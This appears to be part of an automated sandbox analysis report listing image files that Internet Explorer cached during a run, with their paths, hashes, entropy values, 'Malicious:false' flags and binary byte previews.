                                        SHA1:6E4BFC3BEE740EC8772B95C0A799619D5A182E6E
                                        SHA-256:5B9103D8CE4F9CA2DCAC9F39C48B1920A26878EC03FF50D0E295D5AED0EE8DAE
                                        SHA-512:D6649872B44DD18F2EC79287CEB8A5F755608C0F75553DBE7BA4EBFE477F3A5583C1EA6D23080E18439011DBBAA78D5600E30CAE1C5E13191D5B25AE19CAAFE9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R.).Ta.=D.~T.].|.Kg.}.h..%.......d..Wa........2.....V.f\.<.$.l.6......N.5t.....\y*.G.N..Ts..+..u..1I..`pC.b.'}Q3...%..2F.........m~.M.6...l.#.uf2..........f.2...V.kI....Rc.}...{.........d..%.o.W.~.SIu...W..^...RI...(;p. ....Z[......a..i?..>.\.j.]t/xsP.).|..L..<........y.....E\..+..)..ru..=X. .T..!n5.X.....,.v..1.X...,r4@.:.q.G.\...g.C&....WA...2...).T.EH.7\. .(.*......A..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgJnJ[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):11532
                                        Entropy (8bit):7.851516433481847
                                        Encrypted:false
                                        SSDEEP:192:Q2JEDuAiMDafoxvWYzzawyHZvxczunLlArDYUbG272hGfc9wBuKEPlxP:NJLAgT8AZWzuLleYr3GfcfK4lxP
                                        MD5:583AD5872841584F57A8D272DBEF1F75
                                        SHA1:7DCEA6EC88FC3091D5F9B6591C461ED9412307B3
                                        SHA-256:DA23C9C4E4ACB95DB36BFF69DEEDF8152B63A84E932D3B17DC63B2D01B885765
                                        SHA-512:709ABC7640C2D509E36B9A428DB8B3DE2247A64AD0AA06704865343046C4A0309C6E4B9808274DDD84911D0B3FC2ACCAF3E7892A224E348D027AF88A99F08F97
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..v.%.......d..UQ`..n"D....L]..l0kt!.6*%...\2.J*....j.Z.Bh.G4....7......E.....C..)$...L........).m+.a.M..3.@.Jj..D.P.ku.%..C...Y......#t...5.^....r.....]....... .#>.vTN......4.2..Nd..*.$T..@D.)F...U.Ul.8..._.2..d.4..%Y......NJ..P...F.D......V...Lb...X..4.C@.#4......(...hLR......c@.....Xw.d.r._.;.2.``..Z .......h.B29.FlP(."..@.E....g...2......dg<..}.....4*M8....B.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgjXB[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                        Category:dropped
                                        Size (bytes):7496
                                        Entropy (8bit):7.872783514358589
                                        Encrypted:false
                                        SSDEEP:192:Qn4PY809lw6ix9juWbyzWHyqQVnqWHLtYJ1xkl6d:0ovVxwWbryqQVnqWHG1H
                                        MD5:60C730BB16740319B2A30E9F11BE67E0
                                        SHA1:74B35979046B1B152F7A9877CAD81CC64E120C0A
                                        SHA-256:CC70CEABB3BE619DD85D82AEA0D3294FDD96093D467B394FE17FE4761E013721
                                        SHA-512:5C3682AF6548F8E2355AEF64D4F9DB864DE73BCD0331AFAFCFC4B5EE4B0B2A5BBBC806DAAC80F10667E97CE7FA9807076E769870310C19ADE9ED5BDA75E920CD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..b.1....!....R......Oe...I@..........~. e....*.6.Q..L.g.Rr..u`k5..9O.j...j.fY..?..gN..?..C...95......h..^.Ly............$.~!..&4g..i.AHb.Dm...+..-.!`......v..v.C...)......5'd5....^..5.D.._.CN....5.!.t..5..@1....sL...s.....Sf;.].S.....{w.......|....M..(c......P2[>.....[..}..z....mV.....u.>....G..8.!q@....P.@...l....@......f.?|.i.e.....&.Cj..TX....C.1..f.Q.qMn.;t.......Z....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgpXv[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                        Category:dropped
                                        Size (bytes):15626
                                        Entropy (8bit):7.962500897509523
                                        Encrypted:false
                                        SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                        MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                        SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                        SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                        SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...nA.<z.....VI?{.#.j.4...{.l.....]ID2..!...8.q.c.._p*p.[..P.)...D..v.:pi...m...+..6r.qZBVD.\.K.qj....G@y..+....g.C:.M.,A ...:...b..V.R..r.Y........ ..Q.-..R.K@O....N..3...m..W..S..Y|..P....nv....J..K.3...nn.....ih....r..z...2..`7.......no.y.......W....4G...O..0..,..NI.&....R.3.SD..LB6..#8..J...C....|..l..)8.1[..c-.0....R..C.I.w..>.....C.4y$..l...G.K.c.t..s..bH.RH.....!.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgs0a[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):13020
                                        Entropy (8bit):7.879416972104943
                                        Encrypted:false
                                        SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                        MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                        SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                        SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                        SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....QB......]..m..m...`(L.....A..1@.(....(.q@...\P1@......b....-!.(....(.......qA..........OD..m..P.s.r..@.(3.......4..=.@..@."...0 QA#.@.(.qL..@...\P......b....m...0.P...\P.....(........(......(.........S.d..~f...j.)9.. .....i...)..P.E.V......b....(...(.q@...6.......1H.m0....h.m.....(.@...!...1@...(.........H...].....p..J.......... P1......P!.P..@...$p.....(..P..@..Hb.,..@....b...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgsFa[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):1980
                                        Entropy (8bit):7.722254195309331
                                        Encrypted:false
                                        SSDEEP:48:QfAuETAzZnh/4wm26epq61IlPUSw+wY6GBV/EohMAsHPJ:Qf7EOFbmpeVgwM6OKvJ
                                        MD5:EFD2E952BEDD592AABB3A0B3766CE388
                                        SHA1:9F866C37AC1F904BEC9521FE2F3F45A592ABCCAD
                                        SHA-256:2A51739796CCA7D48ED39A1152A0C2FBFF0FEC599D3788B8FD44D0DD1801333E
                                        SHA-512:E84BAEC627181E4C87363B5414C7E975A0E95D8FA8E0C12DE43E3F204D3BD71D18094F4238C3A833FAC04B33E6BD176D8D1D24ABCA689B1C0EADBD8590FE39F0
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..b......@.Z..o..-...7....A....<G2..B...j..\...5...w08.{.*%..3H.m...1@.......b..P0.g/.}Q$.kk#3+.".Fx.ZB=Il.....-.N......b.o..{.a..J.P:....;...xo-F......... ..............6.dw...'...i.....4.M.7.,. p~b....!.......w..\...p..S....5.....D....S.S...".0.K.(..iX..c...".13................A..m@.9.{.......$uR.J..N...i#FM$n.%.... XK. 2J..P.....:.e....Z.Eg.~T2.\.....{g.T......x..Q.8.b.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgumt[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):12102
                                        Entropy (8bit):7.83903065961955
                                        Encrypted:false
                                        SSDEEP:192:Q259xLWdPUGydsUzuizxcSo5s3N3QStlw12PJd0dymT+QMe3RmFM1iCXJsR2:N7xEPUGgzuizxAs3NAStuwJmsm6Q6F2
                                        MD5:6C482BFC9BCC034E5552DAF300C6433B
                                        SHA1:8D06F42B3A9D940A2D52CDD464EC2E66649802C5
                                        SHA-256:A5A1B76BF9BAE3CA8B2B5D8EDFA17EC093979C33AEC7FBF4E356803C891762D9
                                        SHA-512:6808BD613190107D795D016200C0186650CF51AFC5BE84F8FD05219810B817406EDD6D9CF9F6BA6F6C2D6F6F33069A09B4464CFC1401739E1F5E69B0648FDCE7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?... J."..V...@.m...@..........;...h.6.@..@..(....\P.....@...1@...]..m.a........pZ@<....h.......h......<Rc..1Q....(w.I.h. )...3 ..?J.B......\.V...........@.........b...@.....P....@.........(.......1@....(..P.....0.@...P....M.(ZC.....pZC...&..?1..c-.*.F..C#y.....nI.8...D.#.)...#$~b.#..."X.2e..)Z.....(.(..h...\P.@.../Z.qE..(..@..(....H..C...6..8..xZ.P1......8P;...p.(...q.R..s@..1.b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgzH6[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):17001
                                        Entropy (8bit):7.557235539199786
                                        Encrypted:false
                                        SSDEEP:384:IA8xSo7+zIo4rNZQQ4svcGancTZ0KIlBz0IjmOk+lduu/6xIL:IjEUogv4svcbcToN0+Xuuay
                                        MD5:EAECF54AA2CDC33FC2D7238560F601AE
                                        SHA1:1E25B64DA671A1DBEA98643F2357BD04761820D9
                                        SHA-256:B35091DD6B77688B9E49CDD17A2F196E864624B39D2EBB95B63DE927F69B07CD
                                        SHA-512:43C47B5BB9E8339EB207239C3338A6C1E259711F52CDB7852CD3CE657F0A4B2BC2D2583A2C07409208F5959AAE6A7439D00700AE9F8FB3C0C5B2F1FE2D561637
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?............P...."{7..F.4......X..c,>.o..b0=i...9.).i....x,..1..p.y..9.......#.f.Z.Ci.J.;....J.)..@.h.(.4.....P..@..c.h....&....@.ZD..CP3..{s..........>K.6..4...P.8.D.s....!..q..q..b.......`..1.ycx..Z`s...(...S.....@...AL...@.......@....P.P....)=..gUo4O. P..M..8..d.5.p#..][..#.@.M4m.U.9.Cc..q...5.R9X...W.'Im.84....P.t.J....l..........-.(.......`.s..?.;........NK....l..{g.J.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB10MkbM[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):936
                                        Entropy (8bit):7.711185429072882
                                        Encrypted:false
                                        SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                        MD5:19B9391F3CA20AA5671834C668105A22
                                        SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                        SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                        SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+.....ZIDATx.m._hSW....?....E...U.Z.M..a.1.}P..6+.....l......LDA......u.a.U..P..&k..Iz...&....R_.q.=p8....~.'...5..}......_.I$FS.\.c][4#.........+...U@fZz.Y.......|.7....r.x..S.?.ws....B9.P.-Yt*..N.}.'V......G...5....uc....XV.=.{..ai.pw.v)...(.9.z\|.3:Q..,qr.es...ZTp..Mt.iB.2.{w.C*WB..F...b../.H..\..*.).0l.R......c........@S5.?3...q..:..8.?....p.=6`..T...5.nn........]..b.j.,..pf.....8...".M..?.@K...L.='.1.O.2Kb.p..(..\.D.......n..._.....0.............w^bR....v\..)..l..f..l..M.m.6t.7....U.Y3?.h=..!.<.._........pL..V"[.......{[P....e07...Wc....IH.T@...*..A@.......;....>Gt&...}...o...KP...7W1.sm~...&.......00.....>/....l.#.t......2.....L_Owu.*.A)...-.w.*.1/+.)....XR.A#;..X...p..3!...H.....f.ok;..|x..1.R.\W.H\...<..<&.M!mk:|....%.<..,.%.g..g..G@z^Q..I...T.D^..G.&v6$.J.2J....~..Y\kX.j.......c.&.>.3..........ek..+..~B.\......IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB14hq0P[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):19135
                                        Entropy (8bit):7.696449301996147
                                        Encrypted:false
                                        SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                        MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                        SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                        SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                        SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cEP3G[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):1088
                                        Entropy (8bit):7.81915680849984
                                        Encrypted:false
                                        SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                        MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                        SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                        SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                        SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;*J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x*..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 50 x 50
                                        Category:dropped
                                        Size (bytes):2313
                                        Entropy (8bit):7.594679301225926
                                        Encrypted:false
                                        SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                        MD5:59DAB7927838DE6A39856EED1495701B
                                        SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                        SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                        SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBVuddh[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):316
                                        Entropy (8bit):6.917866057386609
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                        MD5:636BACD8AA35BA805314755511D4CE04
                                        SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                        SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                        SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBXXVfm[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):842
                                        Entropy (8bit):7.712790381238881
                                        Encrypted:false
                                        SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                        MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                        SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                        SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                        SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r|......|1?S.|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\cf0f64e7-0354-429d-b700-c0cb0384258a[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                        Category:dropped
                                        Size (bytes):87750
                                        Entropy (8bit):7.971920862407236
                                        Encrypted:false
                                        SSDEEP:1536:rV71v5me8Il0WbASXD+HpcgZz9UoN2VXWmWZ8kiTbL/AR9v2jpW4JgJs:Z71RJl0WhXDEA5WTZt/MpTOu
                                        MD5:C664CC3A06C7E91256C992E6DBC7F38C
                                        SHA1:68D9D406B5536B88D3DE4B339E9E53FD546572B4
                                        SHA-256:8812FF9A4A6A6D35408460D10BF89FAC4BCB7DC44EDEA5067013789F544458F2
                                        SHA-512:00D7320664B6C0786534AF7E4D709926E1CC8627A6AFA6063A67234F4616B77F8F1460C6214B5B22C5CD1442C5B69705A18E7B0D8F82E3B0BB9A4DEE6943966C
                                        Malicious:false
                                        Reputation:unknown
